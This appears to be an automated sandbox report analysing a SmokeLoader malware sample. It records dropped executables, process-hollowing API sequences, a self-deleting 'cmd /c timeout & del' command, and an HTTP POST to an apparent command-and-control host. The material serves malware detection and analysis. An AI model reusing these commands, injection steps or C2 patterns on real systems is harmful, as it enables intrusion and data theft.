                        Source: C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yubswhv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: host-data-coin-11.com
                        Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49759 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing:

                        barindex
                        Yara detected SmokeLoaderShow sources
                        Source: Yara matchFile source: 0000001C.00000002.503480050.00000000005B1000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.374208740.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001C.00000002.503274211.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.353435896.0000000004E91000.00000020.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.435228556.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.374186262.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.435588764.00000000006B1000.00000004.00020000.sdmp, type: MEMORY
                        Source: AA02.exe, 00000016.00000002.527637777.000000000088A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                        System Summary:

                        barindex
                        .NET source code contains very large array initializationsShow sources
                        Source: C169.exe.4.dr, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        Source: 16.0.C169.exe.900000.1.unpack, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        Source: 16.0.C169.exe.900000.0.unpack, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        Source: 16.0.C169.exe.900000.2.unpack, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        Source: 16.0.C169.exe.900000.3.unpack, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        Source: 16.2.C169.exe.900000.0.unpack, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        Source: 23.0.C169.exe.990000.2.unpack, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        Source: 23.0.C169.exe.990000.5.unpack, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        Source: 23.0.C169.exe.990000.7.unpack, Oldening.Stubs/PageContainerStub.csLarge array initialization: PopInfo: array initializer size 189736
                        PE file contains section with special charsShow sources
                        Source: D375.exe.4.drStatic PE information: section name:
                        Source: D375.exe.4.drStatic PE information: section name:
                        Source: D375.exe.4.drStatic PE information: section name:
                        Source: D375.exe.4.drStatic PE information: section name:
                        Source: D375.exe.4.drStatic PE information: section name:
                        PE file has nameless sectionsShow sources
                        Source: A70A.exe.4.drStatic PE information: section name:
                        Source: A70A.exe.4.drStatic PE information: section name:
                        Source: A70A.exe.4.drStatic PE information: section name:
                        Source: C:\Users\user\AppData\Local\Temp\D466.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 520
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_0040AD52
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_0040CD61
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_0040A5BE
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_0040BED0
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 0_2_0040B2A3
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_00402A5F
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_00402AB3
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_00402A5F
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_00402B2E
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 8_2_04793253
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 8_2_047931FF
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_00402A5F
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_00402AB3
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_00402A5F
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_00402AB3
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013EE0A1
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013EF301
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013ED3D1
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013E52CD
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013DE532
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013E8509
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013EC401
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013E89E3
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013ED9C1
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013E8801
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013EE861
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013EC8A1
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013E4BF1
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013E3AC2
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013E8D2C
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013EBDF1
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013ECDE1
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013F4DD6
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013E3C15
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_013EEF91
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_012680B8
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_01268400
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_0126BDD0
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_01268CD0
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_01271E50
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_01271E41
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeCode function: 11_2_0129ABD8
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_02A8B950
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_02A8E260
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_02A8E9EB
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_05210978
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_05212AF0
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_052A9048
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_052ACB10
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_052AA7D8
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_052A83D0
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_052AD26A
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_052ABE70
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_052ADED8
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00410E10
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_0040FF80
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00410580
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_00410390
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: 22_2_0043D910
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 23_2_02ACEC68
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 23_2_05DE0040
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 23_2_05DE0007
                        Source: QMn13jz6nj.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: QMn13jz6nj.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: A70A.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: D466.exe.4.drStatic PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
                        Source: D466.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: D466.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: ddigjgj.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: ddigjgj.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: C:\Windows\explorer.exeSection loaded: taskschd.dll
                        Source: C:\Windows\explorer.exeSection loaded: webio.dll
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeSection loaded: mscorjit.dll
                        Source: sqlite3[1].dll.22.drStatic PE information: Number of sections : 19 > 10
                        Source: sqlite3.dll.22.drStatic PE information: Number of sections : 19 > 10
                        Source: QMn13jz6nj.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        Source: 23.2.C169.exe.2f893c6.2.unpack, type: UNPACKEDPEMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                        Source: 00000010.00000002.499816087.0000000003BB1000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                        Source: Process Memory Space: C169.exe PID: 6276, type: MEMORYSTRMatched rule: SUSP_Double_Base64_Encoded_Executable date = 2019-10-29, hash1 = 1a172d92638e6fdb2858dcca7a78d4b03c424b7f14be75c2fd479f59049bc5f9, author = Florian Roth, description = Detects an executable that has been encoded with base64 twice, reference = https://twitter.com/TweeterCyber/status/1189073238803877889
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCode function: String function: 00404850 appears 458 times
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_00401962 Sleep,NtTerminateProcess,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_0040196D Sleep,NtTerminateProcess,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_00401A0B NtTerminateProcess,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_00402084 LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_2_00402491 NtOpenKey,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_00402084 LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeCode function: 2_1_00402491 NtOpenKey,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 8_2_04790110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_00401962 Sleep,NtTerminateProcess,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_0040196D Sleep,NtTerminateProcess,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_00401A0B NtTerminateProcess,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_00402084 LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_2_00402491 NtOpenKey,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_00402084 LocalAlloc,NtQuerySystemInformation,
                        Source: C:\Users\user\AppData\Roaming\ddigjgjCode function: 9_1_00402491 NtOpenKey,
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_05215368 NtAllocateVirtualMemory,
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_052152B0 NtUnmapViewOfSection,
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_05215363 NtAllocateVirtualMemory,
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeCode function: 16_2_052152A8 NtUnmapViewOfSection,
                        Source: QMn13jz6nj.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: D466.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: ddigjgj.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: A70A.exe.4.drStatic PE information: Section: ZLIB complexity 1.00011934878
                        Source: D375.exe.4.drStatic PE information: Section: ZLIB complexity 1.00025390625
                        Source: D375.exe.4.drStatic PE information: Section: ZLIB complexity 0.98994140625
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ddigjgjJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@33/32@65/4
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: QMn13jz6nj.exeVirustotal: Detection: 47%
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknownProcess created: C:\Users\user\Desktop\QMn13jz6nj.exe "C:\Users\user\Desktop\QMn13jz6nj.exe"
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeProcess created: C:\Users\user\Desktop\QMn13jz6nj.exe "C:\Users\user\Desktop\QMn13jz6nj.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\ddigjgj C:\Users\user\AppData\Roaming\ddigjgj
                        Source: C:\Users\user\AppData\Roaming\ddigjgjProcess created: C:\Users\user\AppData\Roaming\ddigjgj C:\Users\user\AppData\Roaming\ddigjgj
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A70A.exe C:\Users\user\AppData\Local\Temp\A70A.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C169.exe C:\Users\user\AppData\Local\Temp\C169.exe
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D466.exe C:\Users\user\AppData\Local\Temp\D466.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\AA02.exe C:\Users\user\AppData\Local\Temp\AA02.exe
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess created: C:\Users\user\AppData\Local\Temp\C169.exe C:\Users\user\AppData\Local\Temp\C169.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B6B5.exe C:\Users\user\AppData\Local\Temp\B6B5.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D375.exe C:\Users\user\AppData\Local\Temp\D375.exe
                        Source: C:\Users\user\AppData\Local\Temp\D466.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 520
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeProcess created: C:\Users\user\AppData\Local\Temp\B6B5.exe C:\Users\user\AppData\Local\Temp\B6B5.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\EE61.exe C:\Users\user\AppData\Local\Temp\EE61.exe
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\AA02.exe" & exit
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess created: C:\Users\user\AppData\Local\Temp\EE61.exe C:\Users\user\AppData\Local\Temp\EE61.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
                        Source: C:\Users\user\Desktop\QMn13jz6nj.exeProcess created: C:\Users\user\Desktop\QMn13jz6nj.exe "C:\Users\user\Desktop\QMn13jz6nj.exe"
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A70A.exe C:\Users\user\AppData\Local\Temp\A70A.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C169.exe C:\Users\user\AppData\Local\Temp\C169.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D466.exe C:\Users\user\AppData\Local\Temp\D466.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\AA02.exe C:\Users\user\AppData\Local\Temp\AA02.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B6B5.exe C:\Users\user\AppData\Local\Temp\B6B5.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\D375.exe C:\Users\user\AppData\Local\Temp\D375.exe
                        Source: C:\Users\user\AppData\Roaming\ddigjgjProcess created: C:\Users\user\AppData\Roaming\ddigjgj C:\Users\user\AppData\Roaming\ddigjgj
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeProcess created: C:\Users\user\AppData\Local\Temp\C169.exe C:\Users\user\AppData\Local\Temp\C169.exe
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\AA02.exe" & exit
                        Source: C:\Users\user\AppData\Local\Temp\B6B5.exeProcess created: C:\Users\user\AppData\Local\Temp\B6B5.exe C:\Users\user\AppData\Local\Temp\B6B5.exe
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeProcess created: C:\Users\user\AppData\Local\Temp\EE61.exe C:\Users\user\AppData\Local\Temp\EE61.exe
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
                        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A70A.tmpJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\A70A.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\C169.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\EE61.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_01
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6636
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4788:120:WilError_01
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeCommand line argument: WA
                        Source: 11.2.A70A.exe.12e0000.0.unpack, l2vD8Fitdl8qSVEp19/mEqmoE9UxRmX9ogcto.csCryptographic APIs: 'CreateDecryptor'
                        Source: 11.2.A70A.exe.12e0000.0.unpack, l2vD8Fitdl8qSVEp19/mEqmoE9UxRmX9ogcto.csCryptographic APIs: 'CreateDecryptor'
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AA02.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\AppData\Local\Temp\D466.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: QMn13jz6nj.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: profapi.pdb source: WerFault.exe, 0000001B.00000003.493685520.0000000004B57000.00000004.00000040.sdmp
                        Source: Binary string: msvcrt.pdbk source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: EE61.exe, 0000001F.00000000.557886650.0000000000400000.00000040.00000001.sdmp, EE61.exe, 0000001F.00000000.560895556.0000000000400000.00000040.00000001.sdmp, EE61.exe, 0000001F.00000002.568131871.0000000000400000.00000040.00000001.sdmp
                        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000001B.00000003.475546297.000000000488F000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: sechost.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
                        Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000001B.00000003.493530727.0000000004B50000.00000004.00000040.sdmp
                        Source: Binary string: wntdll.pdb source: WerFault.exe, 0000001B.00000003.493369014.0000000004B81000.00000004.00000001.sdmp
